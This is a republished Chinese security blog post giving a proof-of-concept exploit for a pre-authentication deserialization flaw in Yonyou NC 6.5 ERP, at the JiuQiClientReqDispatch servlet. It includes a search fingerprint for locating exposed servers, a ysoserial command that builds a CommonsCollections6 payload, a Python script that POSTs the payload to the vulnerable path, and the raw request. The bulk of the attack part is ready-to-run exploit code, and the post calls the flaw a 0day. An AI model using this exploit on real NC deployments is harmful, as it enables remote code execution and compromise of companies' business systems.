道一安全(本公众号)的技术文章仅供参考
用友NC是一个全面的企业资源规划(ERP)软件,可以帮助中小型企业实现资源规划和管理。该软件综合了财务、销售、采购、库存、生产、人力资源、客户关系管理等业务。
app="用友-UFIDA-NC"
版本号nc6.5产品
代码审计moudules/ufoe模块路由时,发现com.ufsoft.iufo.jiuqi.JiuQiClientReqDispatch类存在反序列化漏洞。
缺陷代码如下:
漏洞复现
①:利用ysoserial生成恶意包。
java -jar ysoserial-all.jar CommonsCollections6"calc.exe">nc65.bin
②:编写python脚本,读取nc65.bin并构造POST请求。
import requestsproxies={"http":"http://127.0.0.1:8888"}with open("nc65.bin","rb") as f:data =f.read()url ="http://192.168.40.146:8010/servlet/~ufoe/com.ufsoft.iufo.jiuqi.JiuQiClientReqDispatch"r = requests.post(url=url, data=data, proxies=proxies)print(r)
由于本地burpsuite的代理端口为8888,因此请求和响应的数据包都可以转发到burpsuite上。
运行脚本,此时在虚拟机(windows server 2008)中已经弹出计算器。在burpsuite中找到数据包并发送到Repeater,截图证明:
完整数据包如下:
POST/servlet/~ufoe/com.ufsoft.iufo.jiuqi.JiuQiClientReqDispatch HTTP/1.1Host: 192.168.40.149:8010User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 1281
原文始发于微信公众号(道一安全):【0day】用友nc65 jiuqisingleservlet前台反序列化 POC+分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论